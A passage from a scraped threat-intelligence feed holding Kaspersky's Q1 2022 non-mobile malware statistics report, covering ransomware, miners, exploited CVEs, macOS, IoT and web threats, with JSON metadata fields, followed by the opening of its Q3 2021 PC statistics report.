position.\n\nWhoever it may have been, the leaked ransomware source codes in the public domain will obviously be at the fingertips of other cybercriminals, which is what happened on more than one occasion with examples like [Hidden Tear](<https://securelist.com/hidden-tear-and-its-spin-offs/73565/>) and Babuk.\n\n#### Attacks on NAS devices\n\nNetwork-attached storage (NAS) devices continue to be targeted by ransomware attacks. A new [wave of Qlocker Trojan infections](<https://www.bleepingcomputer.com/news/security/qlocker-ransomware-returns-to-target-qnap-nas-devices-worldwide/>) on QNAP NAS devices occurred in January following a brief lull which lasted a few months. 
A new form of ransomware infecting QNAP NAS devices also appeared in the month of January called [DeadBolt](<https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-deadbolt-ransomware-encrypting-nas-devices/>), and [ASUSTOR](<https://www.bleepingcomputer.com/news/security/deadbolt-ransomware-now-targets-asustor-devices-asks-50-btc-for-master-key/>) devices became its new target in February.\n\n#### Maze Decryptor\n\nMaster decryption keys for Maze, Sekhmet and Egregor ransomware were made public in February. The keys turned out to be authentic and we increased our support to decrypt files encrypted by these [infamous](<https://securelist.com/maze-ransomware/99137/>) forms of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) in our RakhniDecryptor utility. The decryptor is available on the website of our [No Ransom](<https://noransom.kaspersky.com/>) project and the website of the international NoMoreRansom project in the [Decryption Tools](<https://www.nomoreransom.org/en/decryption-tools.html>) section.\n\n### Number of new modifications\n\nIn Q1 2022, we detected eight new ransomware families and 3083 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2021 \u2014 Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231301/03-en-ru-es-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2022, Kaspersky products and technologies protected 74,694 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231325/04-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q1 2022 
([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231349/05-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.08 \n2 | Yemen | 1.52 \n3 | Mozambique | 0.82 \n4 | China | 0.49 \n5 | Pakistan | 0.43 \n6 | Angola | 0.40 \n7 | Iraq | 0.40 \n8 | Egypt | 0.40 \n9 | Algeria | 0.36 \n10 | Myanmar | 0.35 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 24.38 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 13.71 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.35 \n4 | (generic verdict) | Trojan-Ransom.Win32.Phny | 7.89 \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.66 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.07 \n7 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 3.72 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.37 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 3.17 \n10 | (generic verdict) | Trojan-Ransom.Win32.Agent | 1.99 \n \n_* Statistics are based on detection verdicts of Kaspersky products. 
The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2022, Kaspersky solutions detected 21,282 new modifications of miners.\n\n_Number of new miner modifications, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231418/06-en-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 508,449 unique users of Kaspersky products and services worldwide.\n\n_Number of unique users attacked by miners, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231445/07-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231509/08-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 3.01 \n2 | Tajikistan | 2.60 \n3 | Rwanda | 2.45 \n4 | Uzbekistan | 2.15 \n5 | Kazakhstan | 1.99 \n6 | Tanzania | 1.94 \n7 | Ukraine | 1.83 \n8 | Pakistan | 1.79 \n9 | Mozambique | 1.69 \n10 | Venezuela | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarter highlights\n\nIn Q1 2022, a number of serious vulnerabilities were found in Microsoft Windows and its components. 
More specifically, the vulnerability [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) was found to be exploited by an unknown group of cybercriminals: a "type confusion" bug in the win32k.sys driver that an attacker can use to gain system privileges. Also worth noting is [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919>), a vulnerability in the User Profile Service which makes it possible to elevate privileges, along with [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21836>), which can be used to forge digital certificates.\n\nOne of the major talking points in Q1 was an exploit that targeted the [CVE-2022-0847](<https://dirtypipe.cm4all.com/>) vulnerability in the Linux OS kernel. It was dubbed "Dirty Pipe". [Researchers discovered](<https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/>) an "uninitialized memory" vulnerability when analyzing corrupted files, which makes it possible to rewrite a part of the OS memory, namely page memory that contains system files' data. This in turn opens up opportunities such as elevating the attacker's privileges to root. It's worth noting that this vulnerability is fairly easy to exploit, which means users of all systems should regularly install security patches and use all available means to prevent infection.\n\nWhen it comes to network threats, this quarter continued to show how cybercriminals often resort to the technique of brute-forcing passwords to gain unauthorized access to various network services, the most popular of which are MSSQL, RDP and SMB. Attacks using the EternalBlue, EternalRomance and similar exploits remain as popular as ever. Due to widespread unpatched versions of Microsoft Exchange Server, networks often fall victim to exploits of ProxyToken, ProxyShell, ProxyOracle and other vulnerabilities. 
One example of a critical vulnerability found is remote code execution (RCE) in the Microsoft Windows HTTP protocol stack which allows an attack to be launched remotely by sending a special network packet to a vulnerable system by means of the HTTP trailer functionality. New attacks on network applications which will probably also become common are RCE attacks on the popular Spring Framework and Spring Cloud Gateway. Specific examples of vulnerabilities in these applications are [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) (Spring4Shell) and [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>).\n\n### Vulnerability statistics\n\nQ1 2022 saw an array of changes in the statistics on common vulnerability types. For instance, the top place in the statistics is still firmly held by exploits targeting vulnerabilities in Microsoft Office and their share has increased significantly to 78.5%. The same common vulnerabilities we've written about on more than one occasion are still the most widely exploited within this category of threats. These are [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which cause a buffer overflow when processing objects in a specially crafted document in the Equation Editor component and ultimately allow an attacker to execute arbitrary code. There's also [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), where opening a specially crafted file with an affected version of Microsoft Office software gives attackers the opportunity to perform various actions on the vulnerable system. 
Another vulnerability found last year which is very popular with cybercriminals is [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which they can exploit through a specially prepared Microsoft Office document with an embedded malicious ActiveX control to execute arbitrary code on the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231538/09-en-malware-report-q1-2022-pc.png>))_\n\nExploits targeting browsers came second again in Q1, although their share dropped markedly to just 7.64%. Browser developers put a great deal of effort into patching vulnerabilities in each new version and closing a large number of gaps in system security. Apart from that, the majority of browsers update automatically, in contrast to Microsoft Office, where many users still run outdated versions and are in no rush to install security updates. That could be precisely the reason why we've seen a reduction in the share of browser exploits in our statistics. However, this does not mean they're no longer an immediate threat. 
For instance, Chrome's developers fixed a number of critical RCE vulnerabilities, including:\n\n * [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>): a "type confusion" vulnerability in the V8 script engine which gives attackers the opportunity to remotely execute code (RCE) in the context of the browser's security sandbox.\n * [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>): a use-after-free vulnerability which allows an attacker to corrupt the process memory and remotely execute arbitrary code when running specially crafted scripts that use animation.\n\nSimilar vulnerabilities were found in the browser's other components: [CVE-2022-0605](<https://nvd.nist.gov/vuln/detail/CVE-2022-0605>), which uses the Web Store API, and [CVE-2022-0606](<https://nvd.nist.gov/vuln/detail/CVE-2022-0606>), which is associated with vulnerabilities in the WebGL backend (ANGLE). Another vulnerability found was [CVE-2022-0604](<https://nvd.nist.gov/vuln/detail/CVE-2022-0604>), which can be used to exploit a heap buffer overflow in Tab Groups, also potentially leading to remote code execution (RCE).\n\nExploits for Android came third in our statistics (4.10%), followed by exploits targeting the Adobe Flash Platform (3.49%), PDF files (3.48%) and Java apps (2.79%).\n\n## Attacks on macOS\n\nThe year began with a number of interesting multi-platform finds: the [Gimmick](<https://www.securityweek.com/chinese-cyberspies-seen-using-macos-variant-gimmick-malware>) multi-platform malware family with Windows and macOS variants that uses Google Drive to communicate with the C&C server, along with the [SysJoker backdoor](<https://threatpost.com/undetected-sysjoker-backdoor-malwarewindows-linux-macos/177532/>) with versions tailored for Windows, Linux and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 13.23 \n2 | AdWare.OSX.Pirrit.j | 12.05 \n3 | Monitor.OSX.HistGrabber.b | 8.83 \n4 | 
AdWare.OSX.Pirrit.o | 7.53 \n5 | AdWare.OSX.Bnodlero.at | 7.41 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.06 \n7 | AdWare.OSX.Pirrit.aa | 6.75 \n8 | AdWare.OSX.Pirrit.ae | 6.07 \n9 | AdWare.OSX.Cimpli.m | 5.35 \n10 | Trojan-Downloader.OSX.Agent.h | 4.96 \n11 | AdWare.OSX.Pirrit.gen | 4.76 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Bnodlero.ax | 4.45 \n14 | AdWare.OSX.Agent.gen | 3.74 \n15 | AdWare.OSX.Agent.q | 3.37 \n16 | Backdoor.OSX.Twenbc.b | 2.84 \n17 | Trojan-Downloader.OSX.AdLoad.mc | 2.81 \n18 | Trojan-Downloader.OSX.Lador.a | 2.81 \n19 | AdWare.OSX.Bnodlero.ay | 2.81 \n20 | Backdoor.OSX.Agent.z | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nThe TOP 20 threats to users detected by Kaspersky security solutions for macOS is usually dominated by various adware apps. The top two places in the rating were taken by adware apps from the AdWare.OSX.Pirrit family, while third place was taken by a member of the Monitor.OSX.HistGrabber.b family of potentially unwanted software which sends users' browser history to its owners' servers.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231608/10-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 2.36 \n2 | Spain | 2.29 \n3 | Italy | 2.16 \n4 | Canada | 2.15 \n5 | India | 1.95 \n6 | United States | 1.90 \n7 | Russian Federation | 1.83 \n8 | United Kingdom | 1.58 \n9 | Mexico | 1.49 \n10 | Australia | 1.36 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2022, the country where the most users 
were attacked was France (2.36%), followed by Spain (2.29%) and Italy (2.16%). Adware from the Pirrit family was encountered most frequently out of all macOS threats in the listed countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol as before. Just one quarter of devices attempted to brute-force our SSH traps.\n\nTelnet | 75.28% \n---|--- \nSSH | 24.72% \n \n**_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2022_**\n\nIf we look at sessions involving Kaspersky honeypots, we see far greater Telnet dominance.\n\nTelnet | 93.16% \n---|--- \nSSH | 6.84% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.07 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26 \n3 | Backdoor.Linux.Mirai.ba | 7.95 \n4 | Backdoor.Linux.Gafgyt.a | 5.55 \n5 | Trojan-Downloader.Shell.Agent.p | 4.62 \n6 | Backdoor.Linux.Mirai.ad | 3.89 \n7 | Backdoor.Linux.Gafgyt.bj | 3.02 \n8 | Backdoor.Linux.Agent.bc | 2.76 \n9 | RiskTool.Linux.BitCoinMiner.n | 2.00 \n10 | Backdoor.Linux.Mirai.cw | 1.98 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nSimilar IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q1-2022/105045/#attacks-on-iot-honeypots>) for Q1 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2022, Kaspersky solutions blocked 1,216,350,437 attacks launched from online resources across the globe. 313,164,030 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231643/11-en-malware-report-q1-2022-pc.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 22.63 \n2 | Tunisia | 21.57 \n3 | Algeria | 16.41 \n4 | Mongolia | 16.05 \n5 | Serbia | 15.96 \n6 | Libya | 15.67 \n7 | Estonia | 14.45 \n8 | Greece | 14.37 \n9 | Nepal | 14.01 \n10 | Hong Kong | 13.85 \n11 | Yemen | 13.17 \n12 | Sudan | 13.08 \n13 | Slovenia | 12.94 \n14 | Morocco | 12.82 \n15 | Qatar | 12.78 \n16 | Croatia | 12.53 \n17 | Republic of Malawi | 12.33 \n18 | Sri Lanka | 12.28 \n19 | Bangladesh | 12.26 \n20 | Palestine | 12.23 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country or territory._\n\nOn average during the quarter, 8.18% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/27074233/13-en-malware-report-q1-2022-pc-1.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2022, our File Anti-Virus detected **58,989,058** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **%**** \n---|---|--- \n1 | Yemen | 48.38 \n2 | Turkmenistan | 47.53 \n3 | Tajikistan | 46.88 \n4 | Cuba | 45.29 \n5 | Afghanistan | 42.79 \n6 | Uzbekistan | 41.56 \n7 | Bangladesh | 41.34 \n8 | South Sudan | 39.91 \n9 | Ethiopia | 39.76 \n10 | Myanmar | 37.22 \n11 | Syria | 36.89 \n12 | Algeria | 36.02 \n13 | Burundi | 34.13 \n14 | Benin | 33.81 \n15 | Rwanda | 33.11 \n16 | Sudan | 32.90 \n17 | Tanzania | 32.39 \n18 | Kyrgyzstan | 32.26 \n19 | Venezuela | 32.00 \n20 | Iraq | 31.93 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231744/13-en-malware-report-q1-2022-pc.png>))_\n\nOverall, 15.48% of user computers globally faced at least one 
Malware-class local threat during Q1. Russia scored 16.88% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T08:00:05", "type": "securelist", "title": "IT threat evolution in Q1 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-40444", "CVE-2022-0604", "CVE-2022-0605", "CVE-2022-0606", "CVE-2022-0609", "CVE-2022-0847", "CVE-2022-1096", "CVE-2022-21836", "CVE-2022-21882", "CVE-2022-21919", "CVE-2022-22947", "CVE-2022-22965"], "modified": "2022-05-27T08:00:05", "id": "SECURELIST:11665FFD7075FB9D59316195101DE894", "href": "https://securelist.com/it-threat-evolution-in-q1-2022-non-mobile-statistics/106531/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T12:37:38", "description": "\n\n * [IT threat evolution Q3 2021](<https://securelist.com/it-threat-evolution-q3-2021/104876/>)\n * **IT threat evolution in Q3 2021. PC statistics**\n * [IT threat evolution in Q3 2021. 
Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2021:\n\n * Kaspersky solutions blocked 1,098,968,315 attacks from online resources across the globe.\n * Web Anti-Virus recognized 289,196,912 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 104,257 unique users.\n * Ransomware attacks were defeated on the computers of 108,323 unique users.\n * Our File Anti-Virus detected 62,577,326 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q3 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 104,257 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150303/01-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150355/02-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.4 \n2 | Tajikistan | 3.7 \n3 | Afghanistan | 3.5 \n4 | Uzbekistan | 3.0 \n5 | Yemen | 1.9 \n6 | Kazakhstan | 1.6 \n7 | Paraguay | 1.6 \n8 | Sudan | 1.6 \n9 | 
Zimbabwe | 1.4 \n10 | Belarus | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.7 \n2 | SpyEye | Trojan-Spy.Win32.SpyEye | 17.5 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.6 \n4 | Trickster | Trojan.Win32.Trickster | 4.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.6 \n6 | Nimnul | Virus.Win32.Nimnul | 3.0 \n7 | Gozi | Trojan-Banker.Win32.Gozi | 2.7 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 2.4 \n9 | Tinba | Trojan-Banker.Win32.Tinba | 1.5 \n10 | Cridex | Backdoor.Win32.Cridex | 1.3 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nIn Q3, the family ZeuS/Zbot (17.7%), as usual, became the most widespread family of bankers. Next came the SpyEye (17.5%) family, whose share doubled from 8.8% in the previous quarter. The Top 3 was rounded out by the CliptoShuffler family (9.6%) \u2014 one position and just 0.3 p.p. down. The families Trojan-Banker.Win32.Gozi (2.7%) and Trojan-Banker.Win32.Tinba (1.5%) have made it back into the Top 10 in Q3 \u2014 seventh and ninth places, respectively.\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Kaseya and the REvil story\n\nIn early July, the group REvil/Sodinokibi [attempted an attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) on the remote administration software Kaseya VSA, compromising several managed services providers (MSP) who used this system. Thanks to this onslaught on the supply chain, the attackers were able to infect over one thousand of the compromised MSPs' client businesses. 
REvil's original $70 million ransom demand in exchange for decryption of all the users hit by the attack was soon moderated to 50 million.\n\nFollowing this massive attack, law enforcement agencies stepped up their attention to REvil, so by mid-July the gang turned off their Trojan infrastructure, suspended new infections and dropped out of sight. Meanwhile, Kaseya got a universal decryptor for all those affected by the attack. [According to](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-August-4th-2021>) Kaseya, it "did not pay a ransom \u2014 either directly or indirectly through a third party". Later [it emerged](<https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html>) that the company got the decryptor and the key from the FBI.\n\nBut already in the first half of September, REvil was up and running again. [According to](<https://www.bleepingcomputer.com/news/security/revil-ransomware-is-back-in-full-attack-mode-and-leaking-data/>) the hacking forum XSS, the group's former public representative known as UNKN "disappeared", and the malware developers, failing to find him, waited awhile and restored the Trojan infrastructure from backups.\n\n#### The arrival of BlackMatter: DarkSide restored?\n\nAs we already wrote in our Q2 report, the group DarkSide folded its operations after their "too high-profile" attack on Colonial Pipeline. 
And now there is a "new" arrival known as BlackMatter, which, as its members [claim](<https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil>), represents the "best" of DarkSide, REvil and LockBit.\n\nFrom our analysis of the BlackMatter Trojan's executable we conclude that most likely it was built using DarkSide's source codes.\n\n#### Q3 closures\n\n * Europol and the Ukrainian police have [arrested](<https://www.europol.europa.eu/newsroom/news/ransomware-gang-arrested-in-ukraine-europol's-support>) two members of an unnamed ransomware gang. The only detail made known is that the ransom demands amounted to \u20ac5 to \u20ac70 million.\n * Following its attack on Washington DC's Metropolitan Police Department, the group Babuk folded (or just suspended) its operations and published an archive containing the Trojan's source code, build tools and keys for some of the victims.\n * At the end of August, Ragnarok (not to be confused with RagnarLocker) suddenly called it a day, deleted all their victims' info from their portal and published the master key for decryption. 
The group gave no reasons for this course of action.\n\n#### Exploitation of vulnerabilities and new attack methods\n\n * The group HelloKitty used to distribute its ransomware by exploiting the vulnerability CVE-2019-7481 in SonicWall gateways.\n * Magniber and Vice Society penetrated the target systems by exploiting the vulnerabilities from the PrintNightmare family (CVE-2021-1675, CVE-2021-34527, CVE-2021-36958).\n * The group LockFile exploited ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to penetrate the victim's network; for lateral expansion they relied on the new PetitPotam attack that gained control of the domain controller.\n * The group Conti also used ProxyShell exploits for its attacks.\n\n### Number of new ransomware modifications\n\nIn Q3 2021, we detected 11 new ransomware families and 2,486 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q3 2020 \u2014 Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150433/03-en-ru-es-malware-report-q3-2021-pc-graphs.png>))_\n\n## Number of users attacked by ransomware Trojans\n\nIn Q3 2021, Kaspersky products and technologies protected 108,323 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150459/04-en-malware-report-q3-2021-pc-graphs.png>))_\n\n## Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150535/05-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.98 \n2 | Uzbekistan | 0.59 \n3 | Bolivia | 0.55 \n4 | Pakistan | 0.52 \n5 | Myanmar | 0.51 \n6 | China | 0.51 \n7 | Mozambique | 0.51 \n8 | Nepal | 0.48 \n9 | Indonesia | 0.47 
\n10 | Egypt | 0.45 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n## Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 27.67% \n2 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 17.37% \n3 | WannaCry | Trojan-Ransom.Win32.Wanna | 11.84% \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.78% \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.58% \n6 | (generic verdict) | Trojan-Ransom.Win32.Phny | 5.57% \n7 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.65% \n8 | (generic verdict) | Trojan-Ransom.Win32.Agent | 2.04% \n9 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.07% \n10 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.04% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2021, Kaspersky solutions detected 46,097 new modifications of miners.\n\n_Number of new miner modifications, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150605/06-en-malware-report-q3-2021-pc-graphs.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks using miners on the computers of 322,131 unique users of Kaspersky products worldwide. And while during Q2 the number of attacked users gradually decreased, the trend was reversed in July and August 2021. 
